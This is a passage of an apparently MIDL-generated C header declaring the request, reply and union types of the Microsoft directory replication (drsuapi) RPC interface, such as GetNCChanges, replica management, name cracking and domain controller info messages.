typedef /*  */ struct __MIDL_drsuapi_0071
    {
    UUID uuidDsaObjDest;
    UUID uuidInvocIdSrc;
    /* [ref] */ DSNAME *pNC;
    USN_VECTOR usnvecFrom;
    /* [unique] */ UPTODATE_VECTOR_V1_EXT *pUpToDateVecDest;
    ULONG ulFlags;
    ULONG cMaxObjects;
    ULONG cMaxBytes;
    ULONG ulExtendedOp;
    ULARGE_INTEGER liFsmoInfo;
    /* [unique] */ PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSet;
    /* [unique] */ PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSetEx;
    SCHEMA_PREFIX_TABLE PrefixTableDest;
    } 	DRS_MSG_GETCHGREQ_V8;

typedef /*  */ struct __MIDL_drsuapi_0072
    {
    UUID uuidDsaObjDest;
    UUID uuidInvocIdSrc;
    /* [ref] */ DSNAME *pNC;
    USN_VECTOR usnvecFrom;
    /* [unique] */ UPTODATE_VECTOR_V1_EXT *pUpToDateVecDest;
    ULONG ulFlags;
    ULONG cMaxObjects;
    ULONG cMaxBytes;
    ULONG ulExtendedOp;
    ULARGE_INTEGER liFsmoInfo;
    /* [unique] */ PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSet;
    /* [unique] */ PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSetEx;
    SCHEMA_PREFIX_TABLE PrefixTableDest;
    ULONG ulMoreFlags;
    } 	DRS_MSG_GETCHGREQ_V10;

typedef /*  */ struct __MIDL_drsuapi_0073
    {
    ULONG ulVersion;
    ULONG cbByteBuffer;
    ULONGLONG ullPadding;
    /* [size_is] */ BYTE rgbBuffer[ 1 ];
    } 	VAR_SIZE_BUFFER_WITH_VERSION;

typedef /*  */ struct __MIDL_drsuapi_0074
    {
    UUID uuidDsaObjDest;
    UUID uuidInvocIdSrc;
    /* [ref] */ DSNAME *pNC;
    USN_VECTOR usnvecFrom;
    /* [unique] */ UPTODATE_VECTOR_V1_EXT *pUpToDateVecDest;
    ULONG ulFlags;
    ULONG cMaxObjects;
    ULONG cMaxBytes;
    ULONG ulExtendedOp;
    ULARGE_INTEGER liFsmoInfo;
    /* [unique] */ PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSet;
    /* [unique] */ PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSetEx;
    SCHEMA_PREFIX_TABLE PrefixTableDest;
    ULONG ulMoreFlags;
    GUID correlationID;
    /* [unique] */ VAR_SIZE_BUFFER_WITH_VERSION *pReservedBuffer;
    } 	DRS_MSG_GETCHGREQ_V11;

typedef /* [switch_type] */ union __MIDL_drsuapi_0075
    {
    /* [case()] */ DRS_MSG_GETCHGREQ_V4 V4;
    /* [case()] */ DRS_MSG_GETCHGREQ_V5 V5;
    /* [case()] */ DRS_MSG_GETCHGREQ_V7 V7;
    /* [case()] */ DRS_MSG_GETCHGREQ_V8 V8;
    /* [case()] */ DRS_MSG_GETCHGREQ_V10 V10;
    /* [case()] */ DRS_MSG_GETCHGREQ_V11 V11;
    } 	DRS_MSG_GETCHGREQ;

typedef /*  */ struct __MIDL_drsuapi_0076
    {
    DRS_COMPRESSED_BLOB CompressedV1;
    } 	DRS_MSG_GETCHGREPLY_V2;

typedef /*  */ 
enum __MIDL_drsuapi_0077
    {
        DRS_COMP_ALG_NONE	= 0,
        DRS_COMP_ALG_UNUSED	= 1,
        DRS_COMP_ALG_MSZIP	= 2,
        DRS_COMP_ALG_WIN2K3	= 3
    } 	DRS_COMP_ALG_TYPE;

typedef /*  */ struct __MIDL_drsuapi_0078
    {
    DWORD dwCompressedVersion;
    DRS_COMP_ALG_TYPE CompressionAlg;
    DRS_COMPRESSED_BLOB CompressedAny;
    } 	DRS_MSG_GETCHGREPLY_V7;

typedef /* [switch_type] */ union __MIDL_drsuapi_0079
    {
    /* [case()] */ DRS_MSG_GETCHGREPLY_V1 V1;
    /* [case()] */ DRS_MSG_GETCHGREPLY_V2 V2;
    /* [case()] */ DRS_MSG_GETCHGREPLY_V6 V6;
    /* [case()] */ DRS_MSG_GETCHGREPLY_V7 V7;
    /* [case()] */ DRS_MSG_GETCHGREPLY_V9 V9;
    } 	DRS_MSG_GETCHGREPLY;

typedef /*  */ struct __MIDL_drsuapi_0080
    {
    /* [ref] */ DSNAME *pNC;
    UUID uuidDsaSrc;
    /* [string][unique] */ unsigned char *pszDsaSrc;
    ULONG ulOptions;
    } 	DRS_MSG_REPSYNC_V1;

typedef /*  */ struct __MIDL_drsuapi_0081
    {
    /* [ref] */ DSNAME *pNC;
    UUID uuidDsaSrc;
    /* [string][unique] */ unsigned char *pszDsaSrc;
    ULONG ulOptions;
    GUID correlationID;
    /* [unique] */ VAR_SIZE_BUFFER_WITH_VERSION *pReservedBuffer;
    } 	DRS_MSG_REPSYNC_V2;

typedef /* [switch_type] */ union __MIDL_drsuapi_0082
    {
    /* [case()] */ DRS_MSG_REPSYNC_V1 V1;
    /* [case()] */ DRS_MSG_REPSYNC_V2 V2;
    } 	DRS_MSG_REPSYNC;

typedef /*  */ struct __MIDL_drsuapi_0083
    {
    /* [ref] */ DSNAME *pNC;
    /* [string][ref] */ unsigned char *pszDsaDest;
    UUID uuidDsaObjDest;
    ULONG ulOptions;
    } 	DRS_MSG_UPDREFS_V1;

typedef /*  */ struct __MIDL_drsuapi_0084
    {
    /* [ref] */ DSNAME *pNC;
    /* [string][ref] */ unsigned char *pszDsaDest;
    UUID uuidDsaObjDest;
    ULONG ulOptions;
    GUID correlationID;
    /* [unique] */ VAR_SIZE_BUFFER_WITH_VERSION *pReservedBuffer;
    } 	DRS_MSG_UPDREFS_V2;

typedef /* [switch_type] */ union __MIDL_drsuapi_0085
    {
    /* [case()] */ DRS_MSG_UPDREFS_V1 V1;
    /* [case()] */ DRS_MSG_UPDREFS_V2 V2;
    } 	DRS_MSG_UPDREFS;

typedef /*  */ struct __MIDL_drsuapi_0086
    {
    /* [ref] */ DSNAME *pNC;
    /* [string][ref] */ unsigned char *pszDsaSrc;
    REPLTIMES rtSchedule;
    ULONG ulOptions;
    } 	DRS_MSG_REPADD_V1;

typedef /*  */ struct __MIDL_drsuapi_0087
    {
    /* [ref] */ DSNAME *pNC;
    /* [unique] */ DSNAME *pSourceDsaDN;
    /* [unique] */ DSNAME *pTransportDN;
    /* [string][ref] */ unsigned char *pszSourceDsaAddress;
    REPLTIMES rtSchedule;
    ULONG ulOptions;
    } 	DRS_MSG_REPADD_V2;

typedef /*  */ struct __MIDL_drsuapi_0088
    {
    /* [ref] */ DSNAME *pNC;
    /* [unique] */ DSNAME *pSourceDsaDN;
    /* [unique] */ DSNAME *pTransportDN;
    /* [string][ref] */ unsigned char *pszSourceDsaAddress;
    REPLTIMES rtSchedule;
    ULONG ulOptions;
    GUID correlationID;
    /* [unique] */ VAR_SIZE_BUFFER_WITH_VERSION *pReservedBuffer;
    } 	DRS_MSG_REPADD_V3;

typedef /* [switch_type] */ union __MIDL_drsuapi_0089
    {
    /* [case()] */ DRS_MSG_REPADD_V1 V1;
    /* [case()] */ DRS_MSG_REPADD_V2 V2;
    /* [case()] */ DRS_MSG_REPADD_V3 V3;
    } 	DRS_MSG_REPADD;

typedef /*  */ struct __MIDL_drsuapi_0090
    {
    /* [ref] */ DSNAME *pNC;
    /* [string] */ unsigned char *pszDsaSrc;
    ULONG ulOptions;
    } 	DRS_MSG_REPDEL_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0091
    {
    /* [case()] */ DRS_MSG_REPDEL_V1 V1;
    } 	DRS_MSG_REPDEL;

typedef /*  */ struct __MIDL_drsuapi_0092
    {
    /* [ref] */ DSNAME *pNC;
    UUID uuidSourceDRA;
    /* [string][unique] */ unsigned char *pszSourceDRA;
    REPLTIMES rtSchedule;
    ULONG ulReplicaFlags;
    ULONG ulModifyFields;
    ULONG ulOptions;
    } 	DRS_MSG_REPMOD_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0093
    {
    /* [case()] */ DRS_MSG_REPMOD_V1 V1;
    } 	DRS_MSG_REPMOD;

typedef /*  */ struct __MIDL_drsuapi_0094
    {
    DWORD dwFlags;
    /* [range] */ DWORD cNames;
    /* [size_is] */ DSNAME **rpNames;
    ATTRBLOCK RequiredAttrs;
    SCHEMA_PREFIX_TABLE PrefixTable;
    } 	DRS_MSG_VERIFYREQ_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0095
    {
    /* [case()] */ DRS_MSG_VERIFYREQ_V1 V1;
    } 	DRS_MSG_VERIFYREQ;

typedef /*  */ struct __MIDL_drsuapi_0096
    {
    DWORD error;
    /* [range] */ DWORD cNames;
    /* [size_is] */ ENTINF *rpEntInf;
    SCHEMA_PREFIX_TABLE PrefixTable;
    } 	DRS_MSG_VERIFYREPLY_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0097
    {
    /* [case()] */ DRS_MSG_VERIFYREPLY_V1 V1;
    } 	DRS_MSG_VERIFYREPLY;

typedef /*  */ 
enum __MIDL_drsuapi_0098
    {
        RevMembGetGroupsForUser	= 1,
        RevMembGetAliasMembership	= ( RevMembGetGroupsForUser + 1 ) ,
        RevMembGetAccountGroups	= ( RevMembGetAliasMembership + 1 ) ,
        RevMembGetResourceGroups	= ( RevMembGetAccountGroups + 1 ) ,
        RevMembGetUniversalGroups	= ( RevMembGetResourceGroups + 1 ) ,
        GroupMembersTransitive	= ( RevMembGetUniversalGroups + 1 ) ,
        RevMembGlobalGroupsNonTransitive	= ( GroupMembersTransitive + 1 ) 
    } 	REVERSE_MEMBERSHIP_OPERATION_TYPE;

typedef /*  */ struct __MIDL_drsuapi_0099
    {
    /* [range] */ ULONG cDsNames;
    /* [size_is][size_is] */ DSNAME **ppDsNames;
    DWORD dwFlags;
    /* [range] */ REVERSE_MEMBERSHIP_OPERATION_TYPE OperationType;
    DSNAME *pLimitingDomain;
    } 	DRS_MSG_REVMEMB_REQ_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0100
    {
    /* [case()] */ DRS_MSG_REVMEMB_REQ_V1 V1;
    } 	DRS_MSG_REVMEMB_REQ;

typedef /*  */ struct __MIDL_drsuapi_0101
    {
    ULONG errCode;
    /* [range] */ ULONG cDsNames;
    /* [range] */ ULONG cSidHistory;
    /* [size_is][size_is] */ DSNAME **ppDsNames;
    /* [size_is] */ DWORD *pAttributes;
    /* [size_is][size_is] */ NT4SID **ppSidHistory;
    } 	DRS_MSG_REVMEMB_REPLY_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0102
    {
    /* [case()] */ DRS_MSG_REVMEMB_REPLY_V1 V1;
    } 	DRS_MSG_REVMEMB_REPLY;

typedef /*  */ struct __MIDL_drsuapi_0103
    {
    unsigned char *pSourceDSA;
    ENTINF *pObject;
    UUID *pParentUUID;
    SCHEMA_PREFIX_TABLE PrefixTable;
    ULONG ulFlags;
    } 	DRS_MSG_MOVEREQ_V1;

typedef /*  */ struct __MIDL_drsuapi_0104
    {
    /* [range] */ unsigned long cbBuffer;
    unsigned long BufferType;
    /* [size_is] */ BYTE *pvBuffer;
    } 	DRS_SecBuffer;

typedef /*  */ struct __MIDL_drsuapi_0105
    {
    unsigned long ulVersion;
    /* [range] */ unsigned long cBuffers;
    /* [size_is] */ DRS_SecBuffer *Buffers;
    } 	DRS_SecBufferDesc;

typedef /*  */ struct __MIDL_drsuapi_0106
    {
    DSNAME *pSrcDSA;
    ENTINF *pSrcObject;
    DSNAME *pDstName;
    DSNAME *pExpectedTargetNC;
    DRS_SecBufferDesc *pClientCreds;
    SCHEMA_PREFIX_TABLE PrefixTable;
    ULONG ulFlags;
    } 	DRS_MSG_MOVEREQ_V2;

typedef /* [switch_type] */ union __MIDL_drsuapi_0107
    {
    /* [case()] */ DRS_MSG_MOVEREQ_V1 V1;
    /* [case()] */ DRS_MSG_MOVEREQ_V2 V2;
    } 	DRS_MSG_MOVEREQ;

typedef /*  */ struct __MIDL_drsuapi_0108
    {
    ENTINF **ppResult;
    SCHEMA_PREFIX_TABLE PrefixTable;
    ULONG *pError;
    } 	DRS_MSG_MOVEREPLY_V1;

typedef /*  */ struct __MIDL_drsuapi_0109
    {
    ULONG win32Error;
    /* [unique] */ DSNAME *pAddedName;
    } 	DRS_MSG_MOVEREPLY_V2;

typedef /* [switch_type] */ union __MIDL_drsuapi_0110
    {
    /* [case()] */ DRS_MSG_MOVEREPLY_V1 V1;
    /* [case()] */ DRS_MSG_MOVEREPLY_V2 V2;
    } 	DRS_MSG_MOVEREPLY;

typedef /*  */ struct __MIDL_drsuapi_0111
    {
    ULONG CodePage;
    ULONG LocaleId;
    DWORD dwFlags;
    DWORD formatOffered;
    DWORD formatDesired;
    /* [range] */ DWORD cNames;
    /* [size_is][string] */ WCHAR **rpNames;
    } 	DRS_MSG_CRACKREQ_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0112
    {
    /* [case()] */ DRS_MSG_CRACKREQ_V1 V1;
    } 	DRS_MSG_CRACKREQ;

typedef /*  */ struct __MIDL_drsuapi_0113
    {
    DS_NAME_RESULTW *pResult;
    } 	DRS_MSG_CRACKREPLY_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0114
    {
    /* [case()] */ DRS_MSG_CRACKREPLY_V1 V1;
    } 	DRS_MSG_CRACKREPLY;

typedef /*  */ struct __MIDL_drsuapi_0115
    {
    DWORD dwFlags;
    DWORD PreferredMaximumLength;
    /* [range] */ DWORD cbRestart;
    /* [size_is] */ BYTE *pRestart;
    } 	DRS_MSG_NT4_CHGLOG_REQ_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0116
    {
    /* [case()] */ DRS_MSG_NT4_CHGLOG_REQ_V1 V1;
    } 	DRS_MSG_NT4_CHGLOG_REQ;

typedef /*  */ struct __MIDL_drsuapi_0117
    {
    LARGE_INTEGER SamSerialNumber;
    LARGE_INTEGER SamCreationTime;
    LARGE_INTEGER BuiltinSerialNumber;
    LARGE_INTEGER BuiltinCreationTime;
    LARGE_INTEGER LsaSerialNumber;
    LARGE_INTEGER LsaCreationTime;
    } 	NT4_REPLICATION_STATE;

typedef /*  */ struct __MIDL_drsuapi_0118
    {
    /* [range] */ DWORD cbRestart;
    /* [range] */ DWORD cbLog;
    NT4_REPLICATION_STATE ReplicationState;
    DWORD ActualNtStatus;
    /* [size_is] */ BYTE *pRestart;
    /* [size_is] */ BYTE *pLog;
    } 	DRS_MSG_NT4_CHGLOG_REPLY_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0119
    {
    /* [case()] */ DRS_MSG_NT4_CHGLOG_REPLY_V1 V1;
    } 	DRS_MSG_NT4_CHGLOG_REPLY;

typedef /*  */ struct __MIDL_drsuapi_0120
    {
    DWORD operation;
    DWORD flags;
    /* [string] */ const WCHAR *pwszAccount;
    /* [range] */ DWORD cSPN;
    /* [size_is][string] */ const WCHAR **rpwszSPN;
    } 	DRS_MSG_SPNREQ_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0121
    {
    /* [case()] */ DRS_MSG_SPNREQ_V1 V1;
    } 	DRS_MSG_SPNREQ;

typedef /*  */ struct __MIDL_drsuapi_0122
    {
    DWORD retVal;
    } 	DRS_MSG_SPNREPLY_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0123
    {
    /* [case()] */ DRS_MSG_SPNREPLY_V1 V1;
    } 	DRS_MSG_SPNREPLY;

typedef /*  */ struct __MIDL_drsuapi_0124
    {
    /* [string] */ LPWSTR ServerDN;
    /* [string] */ LPWSTR DomainDN;
    BOOL fCommit;
    } 	DRS_MSG_RMSVRREQ_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0125
    {
    /* [case()] */ DRS_MSG_RMSVRREQ_V1 V1;
    } 	DRS_MSG_RMSVRREQ;

typedef /*  */ struct __MIDL_drsuapi_0126
    {
    BOOL fLastDcInDomain;
    } 	DRS_MSG_RMSVRREPLY_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0127
    {
    /* [case()] */ DRS_MSG_RMSVRREPLY_V1 V1;
    } 	DRS_MSG_RMSVRREPLY;

typedef /*  */ struct __MIDL_drsuapi_0128
    {
    /* [string] */ LPWSTR DomainDN;
    } 	DRS_MSG_RMDMNREQ_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0129
    {
    /* [case()] */ DRS_MSG_RMDMNREQ_V1 V1;
    } 	DRS_MSG_RMDMNREQ;

typedef /*  */ struct __MIDL_drsuapi_0130
    {
    DWORD Reserved;
    } 	DRS_MSG_RMDMNREPLY_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0131
    {
    /* [case()] */ DRS_MSG_RMDMNREPLY_V1 V1;
    } 	DRS_MSG_RMDMNREPLY;

typedef /*  */ struct __MIDL_drsuapi_0132
    {
    /* [string] */ WCHAR *Domain;
    DWORD InfoLevel;
    } 	DRS_MSG_DCINFOREQ_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0133
    {
    /* [case()] */ DRS_MSG_DCINFOREQ_V1 V1;
    } 	DRS_MSG_DCINFOREQ;

typedef /* [switch_type] */ union __MIDL_drsuapi_0133 *PDRS_MSG_DCINFOREQ;

typedef /*  */ struct __MIDL_drsuapi_0134
    {
    /* [range] */ DWORD cItems;
    /* [size_is] */ DS_DOMAIN_CONTROLLER_INFO_1W *rItems;
    } 	DRS_MSG_DCINFOREPLY_V1;

typedef /*  */ struct __MIDL_drsuapi_0135
    {
    /* [range] */ DWORD cItems;
    /* [size_is] */ DS_DOMAIN_CONTROLLER_INFO_2W *rItems;
    } 	DRS_MSG_DCINFOREPLY_V2;

typedef /*  */ struct __MIDL_drsuapi_0136
    {
    /* [range] */ DWORD cItems;
    /* [size_is] */ DS_DOMAIN_CONTROLLER_INFO_3W *rItems;
    } 	DRS_MSG_DCINFOREPLY_V3;

typedef /*  */ struct __MIDL_drsuapi_0137
    {
    /* [range] */ DWORD cItems;
    /* [size_is] */ DS_DOMAIN_CONTROLLER_INFO_FFFFFFFFW *rItems;
    } 	DRS_MSG_DCINFOREPLY_VFFFFFFFF;

typedef /* [switch_type] */ union __MIDL_drsuapi_0138
    {
    /* [case()] */ DRS_MSG_DCINFOREPLY_V1 V1;
    /* [case()] */ DRS_MSG_DCINFOREPLY_V2 V2;
    /* [case()] */ DRS_MSG_DCINFOREPLY_V3 V3;
    /* [case()] */ DRS_MSG_DCINFOREPLY_VFFFFFFFF VFFFFFFFF;
    } 	DRS_MSG_DCINFOREPLY;

typedef /*  */ struct __MIDL_drsuapi_0139
    {
    /* [ref] */ DSNAME *pObject;
    ATTRBLOCK AttrBlock;
    } 	DRS_MSG_ADDENTRYREQ_V1;

typedef /*  */ struct __MIDL_drsuapi_0140
    {
    ENTINFLIST EntInfList;
    } 	DRS_MSG_ADDENTRYREQ_V2;

typedef /*  */ struct __MIDL_drsuapi_0141
    {
    ENTINFLIST EntInfList;
    DRS_SecBufferDesc *pClientCreds;
    } 	DRS_MSG_ADDENTRYREQ_V3;

typedef /* [switch_type] */ union __MIDL_drsuapi_0142
    {
    /* [case()] */ DRS_MSG_ADDENTRYREQ_V1 V1;
    /* [case()] */ DRS_MSG_ADDENTRYREQ_V2 V2;
    /* [case()] */ DRS_MSG_ADDENTRYREQ_V3 V3;
    } 	DRS_MSG_ADDENTRYREQ;

typedef /*  */ struct __MIDL_drsuapi_0143
    {
    GUID Guid;
    NT4SID Sid;
    DWORD errCode;
    DWORD dsid;
    DWORD extendedErr;
    DWORD extendedData;
    USHORT problem;
    } 	DRS_MSG_ADDENTRYREPLY_V1;

typedef /*  */ struct __MIDL_drsuapi_0144
    {
    GUID objGuid;
    NT4SID objSid;
    } 	ADDENTRY_REPLY_INFO;

typedef /*  */ struct __MIDL_drsuapi_0145
    {
    /* [unique] */ DSNAME *pErrorObject;
    DWORD errCode;
    DWORD dsid;
    DWORD extendedErr;
    DWORD extendedData;
    USHORT problem;
    /* [range] */ ULONG cObjectsAdded;
    /* [size_is] */ ADDENTRY_REPLY_INFO *infoList;
    } 	DRS_MSG_ADDENTRYREPLY_V2;

typedef /*  */ struct __MIDL_drsuapi_0146
    {
    DWORD dwRepError;
    DWORD errCode;
    /* [switch_is] */ DIRERR_DRS_WIRE_V1 *pErrInfo;
    } 	DRS_ERROR_DATA_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0147
    {
    /* [case()] */ DRS_ERROR_DATA_V1 V1;
    } 	DRS_ERROR_DATA;

typedef /*  */ struct __MIDL_drsuapi_0148
    {
    DSNAME *pdsErrObject;
    DWORD dwErrVer;
    /* [switch_is] */ DRS_ERROR_DATA *pErrData;
    /* [range] */ ULONG cObjectsAdded;
    /* [size_is] */ ADDENTRY_REPLY_INFO *infoList;
    } 	DRS_MSG_ADDENTRYREPLY_V3;

typedef /* [switch_type] */ union __MIDL_drsuapi_0149
    {
    /* [case()] */ DRS_MSG_ADDENTRYREPLY_V1 V1;
    /* [case()] */ DRS_MSG_ADDENTRYREPLY_V2 V2;
    /* [case()] */ DRS_MSG_ADDENTRYREPLY_V3 V3;
    } 	DRS_MSG_ADDENTRYREPLY;

typedef /*  */ struct __MIDL_drsuapi_0150
    {
    DWORD dwTaskID;
    DWORD dwFlags;
    } 	DRS_MSG_KCC_EXECUTE_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0151
    {
    /* [case()] */ DRS_MSG_KCC_EXECUTE_V1 V1;
    } 	DRS_MSG_KCC_EXECUTE;

typedef /*  */ struct __MIDL_drsuapi_0152
    {
    ULONGLONG hCtx;
    LONG lReferenceCount;
    BOOL fIsBound;
    UUID uuidClient;
    DSTIME timeLastUsed;
    ULONG IPAddr;
    int pid;
    } 	DS_REPL_CLIENT_CONTEXT;

typedef /*  */ struct __MIDL_drsuapi_0153
    {
    /* [range] */ DWORD cNumContexts;
    DWORD dwReserved;
    /* [size_is] */ DS_REPL_CLIENT_CONTEXT rgContext[ 1 ];
    } 	DS_REPL_CLIENT_CONTEXTS;

typedef /*  */ struct __MIDL_drsuapi_0154
    {
    /* [string] */ LPWSTR pszServerName;
    BOOL fIsHandleBound;
    BOOL fIsHandleFromCache;
    BOOL fIsHandleInCache;
    DWORD dwThreadId;
    DWORD dwBindingTimeoutMins;
    DSTIME dstimeCreated;
    DWORD dwCallType;
    } 	DS_REPL_SERVER_OUTGOING_CALL;

typedef /*  */ struct __MIDL_drsuapi_0155
    {
    /* [range] */ DWORD cNumCalls;
    DWORD dwReserved;
    /* [size_is] */ DS_REPL_SERVER_OUTGOING_CALL rgCall[ 1 ];
    } 	DS_REPL_SERVER_OUTGOING_CALLS;

typedef /*  */ struct __MIDL_drsuapi_0156
    {
    DWORD InfoType;
    /* [string] */ LPWSTR pszObjectDN;
    UUID uuidSourceDsaObjGuid;
    } 	DRS_MSG_GETREPLINFO_REQ_V1;

typedef /*  */ struct __MIDL_drsuapi_0157
    {
    DWORD InfoType;
    /* [string] */ LPWSTR pszObjectDN;
    UUID uuidSourceDsaObjGuid;
    DWORD ulFlags;
    /* [string] */ LPWSTR pszAttributeName;
    /* [string] */ LPWSTR pszValueDN;
    DWORD dwEnumerationContext;
    } 	DRS_MSG_GETREPLINFO_REQ_V2;

typedef /* [switch_type] */ union __MIDL_drsuapi_0158
    {
    /* [case()] */ DRS_MSG_GETREPLINFO_REQ_V1 V1;
    /* [case()] */ DRS_MSG_GETREPLINFO_REQ_V2 V2;
    } 	DRS_MSG_GETREPLINFO_REQ;

typedef /* [switch_type] */ union __MIDL_drsuapi_0159
    {
    /* [case()] */ DS_REPL_NEIGHBORSW *pNeighbors;
    /* [case()] */ DS_REPL_CURSORS *pCursors;
    /* [case()] */ DS_REPL_OBJ_META_DATA *pObjMetaData;
    /* [case()] */ DS_REPL_KCC_DSA_FAILURESW *pConnectFailures;
    /* [case()] */ DS_REPL_KCC_DSA_FAILURESW *pLinkFailures;
    /* [case()] */ DS_REPL_PENDING_OPSW *pPendingOps;
    /* [case()] */ DS_REPL_ATTR_VALUE_META_DATA *pAttrValueMetaData;
    /* [case()] */ DS_REPL_CURSORS_2 *pCursors2;
    /* [case()] */ DS_REPL_CURSORS_3W *pCursors3;
    /* [case()] */ DS_REPL_OBJ_META_DATA_2 *pObjMetaData2;
    /* [case()] */ DS_REPL_ATTR_VALUE_META_DATA_2 *pAttrValueMetaData2;
    /* [case()] */ DS_REPL_SERVER_OUTGOING_CALLS *pServerOutgoingCalls;
    /* [case()] */ UPTODATE_VECTOR_V1_EXT *pUpToDateVec;
    /* [case()] */ DS_REPL_CLIENT_CONTEXTS *pClientContexts;
    /* [case()] */ DS_REPL_NEIGHBORSW *pRepsTo;
    } 	DRS_MSG_GETREPLINFO_REPLY;

typedef /*  */ struct __MIDL_drsuapi_0160
    {
    DWORD Flags;
    /* [string] */ WCHAR *SrcDomain;
    /* [string] */ WCHAR *SrcPrincipal;
    /* [full][string] */ WCHAR *SrcDomainController;
    /* [range] */ DWORD SrcCredsUserLength;
    /* [size_is] */ WCHAR *SrcCredsUser;
    /* [range] */ DWORD SrcCredsDomainLength;
    /* [size_is] */ WCHAR *SrcCredsDomain;
    /* [range] */ DWORD SrcCredsPasswordLength;
    /* [size_is] */ WCHAR *SrcCredsPassword;
    /* [string] */ WCHAR *DstDomain;
    /* [string] */ WCHAR *DstPrincipal;
    } 	DRS_MSG_ADDSIDREQ_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0161
    {
    /* [case()] */ DRS_MSG_ADDSIDREQ_V1 V1;
    } 	DRS_MSG_ADDSIDREQ;

typedef /*  */ struct __MIDL_drsuapi_0162
    {
    DWORD dwWin32Error;
    } 	DRS_MSG_ADDSIDREPLY_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0163
    {
    /* [case()] */ DRS_MSG_ADDSIDREPLY_V1 V1;
    } 	DRS_MSG_ADDSIDREPLY;

typedef /*  */ struct __MIDL_drsuapi_0164
    {
    /* [range] */ ULONG Count;
    /* [size_is] */ DRS_MSG_REVMEMB_REQ_V1 *Requests;
    } 	DRS_MSG_GETMEMBERSHIPS2_REQ_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0165
    {
    /* [case()] */ DRS_MSG_GETMEMBERSHIPS2_REQ_V1 V1;
    } 	DRS_MSG_GETMEMBERSHIPS2_REQ;

typedef /*  */ struct __MIDL_drsuapi_0166
    {
    /* [range] */ ULONG Count;
    /* [size_is] */ DRS_MSG_REVMEMB_REPLY_V1 *Replies;
    } 	DRS_MSG_GETMEMBERSHIPS2_REPLY_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0167
    {
    /* [case()] */ DRS_MSG_GETMEMBERSHIPS2_REPLY_V1 V1;
    } 	DRS_MSG_GETMEMBERSHIPS2_REPLY;

typedef /*  */ struct __MIDL_drsuapi_0168
    {
    /* [ref] */ DSNAME *pNC;
    UUID uuidDsaSrc;
    ULONG ulOptions;
    } 	DRS_MSG_REPVERIFYOBJ_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0169
    {
    /* [case()] */ DRS_MSG_REPVERIFYOBJ_V1 V1;
    } 	DRS_MSG_REPVERIFYOBJ;

typedef /*  */ struct __MIDL_drsuapi_0170
    {
    UUID guidStart;
    DWORD cGuids;
    DSNAME *pNC;
    UPTODATE_VECTOR_V1_EXT *pUpToDateVecCommonV1;
    UCHAR Md5Digest[ 16 ];
    } 	DRS_MSG_EXISTREQ_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0171
    {
    /* [case()] */ DRS_MSG_EXISTREQ_V1 V1;
    } 	DRS_MSG_EXISTREQ;

typedef /*  */ struct __MIDL_drsuapi_0172
    {
    DWORD dwStatusFlags;
    /* [range] */ DWORD cNumGuids;
    /* [size_is] */ UUID *rgGuids;
    } 	DRS_MSG_EXISTREPLY_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0173
    {
    /* [case()] */ DRS_MSG_EXISTREPLY_V1 V1;
    } 	DRS_MSG_EXISTREPLY;

typedef /*  */ struct __MIDL_drsuapi_0174
    {
    /* [string] */ const WCHAR *pwszFromSite;
    /* [range] */ DWORD cToSites;
    /* [size_is][string] */ WCHAR **rgszToSites;
    DWORD dwFlags;
    } 	DRS_MSG_QUERYSITESREQ_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0175
    {
    /* [case()] */ DRS_MSG_QUERYSITESREQ_V1 V1;
    } 	DRS_MSG_QUERYSITESREQ;

typedef /*  */ struct __MIDL_drsuapi_0176
    {
    DWORD dwErrorCode;
    DWORD dwCost;
    } 	DRS_MSG_QUERYSITESREPLYELEMENT_V1;

typedef /*  */ struct __MIDL_drsuapi_0177
    {
    /* [range] */ DWORD cToSites;
    /* [size_is] */ DRS_MSG_QUERYSITESREPLYELEMENT_V1 *rgCostInfo;
    DWORD dwFlags;
    } 	DRS_MSG_QUERYSITESREPLY_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0178
    {
    /* [case()] */ DRS_MSG_QUERYSITESREPLY_V1 V1;
    } 	DRS_MSG_QUERYSITESREPLY;

typedef /*  */ struct __MIDL_drsuapi_0179
    {
    DWORD dwReserved;
    } 	DRS_MSG_INIT_DEMOTIONREQ_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0180
    {
    /* [case()] */ DRS_MSG_INIT_DEMOTIONREQ_V1 V1;
    } 	DRS_MSG_INIT_DEMOTIONREQ;

typedef /*  */ struct __MIDL_drsuapi_0181
    {
    DWORD dwOpError;
    } 	DRS_MSG_INIT_DEMOTIONREPLY_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0182
    {
    /* [case()] */ DRS_MSG_INIT_DEMOTIONREPLY_V1 V1;
    } 	DRS_MSG_INIT_DEMOTIONREPLY;

typedef /*  */ struct __MIDL_drsuapi_0183
    {
    DWORD dwFlags;
